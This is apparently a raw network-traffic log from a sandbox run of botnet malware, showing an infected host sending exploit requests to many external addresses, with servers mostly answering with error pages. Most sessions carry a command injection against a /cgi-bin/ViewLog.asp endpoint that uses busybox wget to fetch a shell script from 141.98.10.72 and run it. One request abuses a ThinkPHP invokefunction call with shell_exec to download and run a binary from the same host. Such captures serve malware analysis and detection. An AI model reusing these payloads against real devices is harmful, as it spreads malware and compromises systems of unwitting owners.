                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 38 26 23 34 36 3b 32 30 30 38 36 36 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;55722c31&#46;1707899638&#46;20086682</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.144005031.136.253.568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.865403891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.086692095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:08.230448961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:20.261970997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349009037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.498927116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.144062494.80.166.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.893338919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.120898008 CET440INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Server: Apache
                                                        Content-Length: 267
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 52 69 63 68 69 65 73 74 61 20 69 6e 6f 70 70 6f 72 74 75 6e 61 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 69 63 68 69 65 73 74 61 20 69 6e 6f 70 70 6f 72 74 75 6e 61 3c 2f 48 31 3e 0a 3c 50 3e 49 6c 20 62 72 6f 77 73 65 72 20 68 61 20 69 6e 76 69 61 74 6f 20 75 6e 61 20 72 69 63 68 69 65 73 74 61 20 63 68 65 20 71 75 65 73 74 6f 20 73 65 72 76 65 72 20 6e 6f 6e 20 c3 a8 20 69 6e 20 67 72 61 64 6f 20 64 69 20 63 6f 6d 70 72 65 6e 64 65 72 65 2e 20 3c 42 52 20 20 2f 3e 0a 3c 2f 50 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Richiesta inopportuna</TITLE></HEAD><BODY><H1>Richiesta inopportuna</H1><P>Il browser ha inviato una richiesta che questo server non in grado di comprendere. <BR /></P></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.145887885.209.136.568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.893389940 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.139194012 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:08:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.145511294.121.181.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.893412113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.145447694.122.31.1128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.894166946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.145952631.44.143.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.898673058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.143725888.198.164.9780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.904342890 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:59.112795115 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:59 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 05 Jun 2014 07:30:50 GMT
                                                        ETag: "438-4fb11b96938d2"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1080
                                                        X-Powered-By: PleskLin
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a 3c 50 3e 0a 43 6c 69 65 6e 74 20 73 65 6e 74 20 6d 61 6c 66 6f 72 6d 65 64 20 48 6f 73 74 20 68 65 61 64 65 72 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 65 61 73 79 73 74 65 6d 70 65 6c 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Client sent malformed Host header<P><HR><ADDRESS>Web Server at easystempel.de</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum.
                                                        Feb 14, 2024 09:33:59.112807989 CET84INData Raw: 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69 6e 67 0a 20 20 20 2d 20 72 69 67 68 74 20 6e 6f 77 2e 0a 20 20 20 2d 2d 3e 0a
                                                        Data Ascii: - Of course, that's exactly what you're reading - right now. -->


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.146090631.160.40.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.904419899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.145059031.200.40.238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.912729979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.144726085.132.46.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:58.940116882 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.217978001 CET304INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:59 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
